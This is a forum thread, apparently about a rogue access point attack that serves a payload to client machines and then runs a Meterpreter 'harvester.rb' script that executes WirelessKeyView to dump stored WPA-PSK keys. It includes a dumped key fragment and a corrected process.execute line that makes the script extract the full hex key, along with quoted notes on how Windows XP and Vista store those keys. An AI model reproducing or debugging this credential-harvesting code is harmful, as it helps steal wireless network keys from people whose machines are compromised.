
Originally Posted by
williamc
Thanks for the response. The Vista problem is before the file is even uploaded. I'm unable to browse to the payload page. The client has received the dhcp information from the attack box, but get "page cannot be displayed" when browsing. I cannot ping the attack box IP or Gateway, I get "Destination Unreachable".
As for the wireless key in hex, this is what I gets dumped into the WKV folder:
Code:
cat FVPVC.txt
Linksys WPA-PSK a78178f5a4050ce82de1 Dell Wireless 1350
w {15CDB4A8-98B9-4285-
Its not 64 bytes, and like I said, crashes Cain when I load it.
William
I found the error why it displays not full WPA-PSK hex key.
In the harvester.rb script change the way wkv.exe is executed from
Code:
client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stabular /#{out}", nil, {'Hidden' => 'false'})
to
Code:
client.sys.process.execute("cmd.exe /c %SystemDrive%\\wkv.exe /stab /#{out}", nil, {'Hidden' => 'false'})
Now it displays the full hex key
and here is the info about the difference bettwen vista and xp
Code:
Notice About WPA-PSK Keys
When you type a WPA-PSK key in Windows XP, the characters that
you type are automatically converted into a new binary key that
contains 32 bytes (64 Hexadecimal digits). This binary key cannot
instantly be converted back to the original key that you typed, but you
can still use it for connecting the wireless network exactly like the
original key. In this case, WirelessKeyView displays this binary key in
the Hex key column, but it doesn't display the original key that you
typed.
As opposed to Windows XP, Windows Vista doesn't convert the
WPA-PSK Key that you type into a new binary key, but it simply keep
the original key that you type. So under Windows Vista, the original
WPA-PSK key that you typed is displayed in the Ascii key column.
Now is all in airbase-team hands.That's the missing part!!!
Hope to get something soon!!!
I know they can